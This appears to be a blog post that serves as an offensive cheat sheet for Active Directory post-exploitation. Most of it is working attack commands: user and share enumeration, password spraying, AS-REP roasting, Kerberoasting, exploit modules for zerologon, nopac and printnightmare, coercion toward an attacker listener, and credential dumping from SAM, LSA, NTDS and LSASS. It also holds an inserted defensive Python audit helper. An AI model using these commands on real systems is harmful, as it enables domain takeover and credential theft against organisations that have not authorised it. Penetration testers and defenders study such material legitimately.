Active Directory Enum

Active Directory Quick Enum

I am creating a simple quick recon checklist for Active Directory environments on an internal network, for post-exploitation and persistence.

System & Identity

Identify the Domain Name and Domain IP Addresses.

[Domain Name]
nxc smb $target
nmap -sCV -T4 -vv -Pn -A $target

[DC IP]
host $Domain
nmcli dev show <interface>

[IPv6]
python3 IOXIDResolver.py -t 192.168.xx.xx

Assume Breach Scenario

—> Possible Common Attacks

Enumerate Users

nxc smb $ip -u '' -p '' --users
kerbrute userenum --dc $IP -d $Domain valid-users.lst -v
net rpc group members 'Domain Users' -W '<domain>' -I '<ip>' -U '%'
nxc smb $ip -u '' -p '' --rid-brute 10000 | grep -i 'sidtypeuser'
ldapsearch -x -H ldap://<ip> -D '<user>@<domain>' -w '<password>' -b '<base_naming_context>' "(objectClass=user)" userPrincipalName
ldapsearch -x -H ldap://<ip> -D "<user>@<domain>" -w '<password>' -b "<base_naming_context>" -s sub '(objectClass=user)' | grep -i samaccountname | awk '{print $2}'
bloodyAD --host $ip -d $domain -u $user -p "$pass" get children --otype useronly
bloodyAD --host $ip -d $domain -u $user -p "$pass" get children --otype computer
impacket-lookupsid $domain/$user@$ip

Enumerate ldap

nmap -Pn -n -sV --script=ldap* -p 389 $ip -vv
ldapsearch -H ldap://<ip> -x -s base namingcontexts
ldapdomaindump -u "$domain\\$user" -p "$pass" $ip -o ldap/
ldapsearch -x -H ldap://<target_ip_or_hostname> -b "<base_naming_context>" "(objectClass=*)" "*"
bloodyAD --host $ip -d $domain -u $user -p "$pass" get writable --detail
bloodyAD -u $user -p "$pass" -d $domain --host $ip get search --filter '(|(userPassword=*)(description=*))' --attr userPassword,description

Enumerate Shares

smbclient -U '%' -L //<ip>    # then inside a share session: recurse OFF, prompt OFF, mget *
nxc smb $ip -u '' -p '' --shares
enum4linux-ng.py -a -u '' -p '' <ip>
manspider $ip -c passw -e xml config pdb -d $Domain -u "$user" -p "$pass"
impacket-smbclient [domain]/[username]:[password]@[target_ip]
impacket-smbclient -k [domain]/[username]@[target_ip]                       # Kerberos authentication
impacket-smbclient -hashes [LMHASH:NTHASH] [domain]/[username]@[target_ip]  # NTLM hash instead of a password

Generate Usernames

username-anarchy -i users.txt > valid-user.lst
GenUser_list.sh -i users.txt > valid-user.lst

TimeRoast

timeroast.py <dc_ip> -o <output_log>
nxc smb $ip -M timeroast
nxc smb $ip -u '' -p '' -M timeroast
nxc smb $ip -u '' -p '' -M timeroast -k

Pre2k

nxc ldap $ip -u '' -p '' --computers
nxc ldap $ip -u '' -p '' -M pre2k -k
python3 pre2k.py unauth -d $domain -dc-ip $ip -inputfile Computers.lst -stoponsuccess
python3 pre2k.py auth -u "$user" -p "$pass" -d $domain -dc-ip $ip -save -verbose
ldapsearch -x -H ldap://$IP -D "<user>@<domain>" -w '<password>' -b "<base_naming_context>" -s sub '(objectClass=user)' | grep -i samaccountname | awk '{print $2}'

[Hacker Recipe Resource]
# 1. find pre-created accounts that never logged on
ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt

# 2. extract the sAMAccountNames of the results
cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt

# 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names
cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt

# 4. bruteforce, line per line (user1:password1, user2:password2, ...)
nxc smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce
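The filter in step 1 (userAccountControl 4128 = WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD, logonCount 0) is also the check a defender runs to find which pre-created computer accounts still need their password reset. The script below is an added example, not code from the post or from any tool it cites; it parses a constructed ldapsearch-style LDIF dump and reports only the accounts that match both conditions, so an account with the same flags that has already logged on is left out.

```python
"""Added audit helper (not from the original post or any tool it cites).
Reports computer accounts matching the recipe's filter, userAccountControl 4128
(WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD) with logonCount 0, from an LDIF
dump. Assumes plain LDIF (no base64 "::" values, no folded continuation lines).
"""
import re

PASSWD_NOTREQD = 0x0020             # UAC bit: password not required
WORKSTATION_TRUST_ACCOUNT = 0x1000  # UAC bit: computer account
PRE2K_MASK = PASSWD_NOTREQD | WORKSTATION_TRUST_ACCOUNT  # 4128, as in the recipe

# Constructed sample dump; hostnames are placeholders, not real data.
SAMPLE_LDIF = """\
sAMAccountName: WS01$
userAccountControl: 4128
logonCount: 0

sAMAccountName: WS02$
userAccountControl: 4096
logonCount: 57

sAMAccountName: SRV01$
userAccountControl: 4128
logonCount: 3
"""

def parse_ldif(text):
    """Return one {attribute: value} dict per blank-line-separated entry."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        attrs = {}
        for line in block.splitlines():
            if ":" in line and not line.startswith("#"):
                key, _, value = line.partition(":")
                attrs[key.strip()] = value.strip()
        if attrs:
            entries.append(attrs)
    return entries

def find_pre2k_accounts(text):
    """sAMAccountNames with both pre-2k UAC bits set that have never logged on."""
    hits = []
    for e in parse_ldif(text):
        uac = int(e.get("userAccountControl", "0"))
        # Parenthesised on purpose: in Python '==' binds tighter than '&'.
        if (uac & PRE2K_MASK) == PRE2K_MASK and int(e.get("logonCount", "0")) == 0:
            hits.append(e["sAMAccountName"])
    return hits  # SRV01$ is excluded: same UAC bits, but it has logged on
```

Running `find_pre2k_accounts(SAMPLE_LDIF)` returns `['WS01$']`, the one account whose password should be reset or whose object should be removed.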

DNS

[Zone Transfer]

dig axfr <domain_name> @<name_server>

Spray Password and Hash

nxc smb $ip -u '' -p '' --continue-on-success --no-bruteforce
NetSpray all $ip -u '' -p '' --continue-on-success --no-brute-force    # or -H '' to spray a hash
kerbrute passwordspray -d <domain> --dc <DC_IP> <user_list> <password>

AS-REP Roasting

nxc ldap $ip -u '' -p '' --asreproast ASREPROAST
impacket-GetNPUsers -dc-ip $ip $Domain/ -usersfile valid_user.lst -format john -outputfile hashes
bloodyAD -u "$user" -p "$password" -d "$domain" --host "$host" get search --filter '(&(!(cn=krbtgt))(&(samAccountType=805306368)(servicePrincipalName=*)))' --attr sAMAccountName | grep sAMAccountName | cut -d ' ' -f 2

Kerberoasting

nxc ldap $ip -u '' -p '' --kerberoasting output.txt
GetUserSPNs.py "$domain/$user:$pass" -dc-ip $ip -request

Kerberoasting without pre-authentication

GetUserSPNs.py domain.local/ -usersfile usersfile -no-preauth $USER -dc-ip $IP

Bloodhound loot

NetExec ldap $target -u '' -p '' --bloodhound --collection All --dns-server $target
bloodhound-python -d $Domain -u "$user" -p "$pass" -ns $ip -dc $Full_Domain -c All --zip
bloodyAD --host $ip -d $domain -u $user -p "$pass" get bloodhound --transitive --path ./Get_bloodhound_loot.zip
rusthound --domain $Domain -u "$user" -p "$pass" --zip
.\SharpHound.exe -s -c all,gpolocalgroup

—> Possible Protocol Attacks

SMB

It refers to Server Message Block, a network protocol for file and printer sharing across Windows, macOS, Linux, etc.

[Guest Access]

nxc smb $ip -u '' -p ''
nxc smb $ip -u 'Guest' -p ''
nxc smb $ip -u '0xmr' -p ''    # any non-existent username

[Enumeration]

nxc smb $ip -u '' -p '' --users --shares
nxc smb $ip -u '' -p '' --rid-brute 20000
nxc smb $ip -u '' -p '' --loggedon-users
nxc smb $ip -u '' -p '' --qwinsta
nxc smb $ip -u '' -p '' --pass-pol
nxc smb $ip -u '' -p '' --dc-list
nxc smb $ip -u '' -p '' --interfaces
nxc smb $ip -u '' -p '' --continue-on-success --no-bruteforce

[Attack]

nxc smb $ip -u '' -p '' -M change-password -o USER=TargetUser NEWPASS=<new_password>    # or NEWHASH=<nt_hash>
nxc smb $ip -u '' -p '' -M spider_plus -o DOWNLOAD_FLAG=true
nxc smb $ip -u '' -p '' -x 'whoami /all'
nxc smb $ip -u '' -p '' -M timeroast
nxc smb $ip -u '' -p '' -M pre2k

[Top CVE]

nxc smb $ip -u '' -p '' -M zerologon
nxc smb $ip -u '' -p '' -M nopac
nxc smb $ip -u '' -p '' -M printnightmare
nxc smb $ip -u '' -p '' -M smbghost
nxc smb $ip -u '' -p '' -M ms17-010
nxc smb $ip -u '' -p '' -M ntlm_reflection
nxc smb $ip -u '' -p '' -M spooler
nxc smb $ip -u '' -p '' --gen-relay-list f.txt
nxc smb $ip -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true

[Credential Dumping]

nxc smb $ip -u '' -p '' -M winscp
nxc smb $ip -u '' -p '' --laps
nxc smb $ip -u '' -p '' --sam
nxc smb $ip -u '' -p '' --lsa
nxc smb $ip -u '' -p '' -M backup_operator
nxc smb $ip -u '' -p '' -M wifi
nxc smb $ip -u '' -p '' -M putty
nxc smb $ip -u '' -p '' -M ntdsutil    # or --ntds
nxc smb $ip -u '' -p '' -M lsassy
nxc smb $ip -u '' -p '' -M nanodump
nxc smb $ip -u '' -p '' -M mimikatz
nxc smb $ip -u '' -p '' -M vnc
nxc smb $ip -u '' -p '' --dpapi    # or --dpapi_hash
nxc smb $ip -u '' -p '' -M notepad    # or -M notepad++

LDAP

It refers to Lightweight Directory Access Protocol.

Coming soon…

This post is licensed under CC BY 4.0 by the author.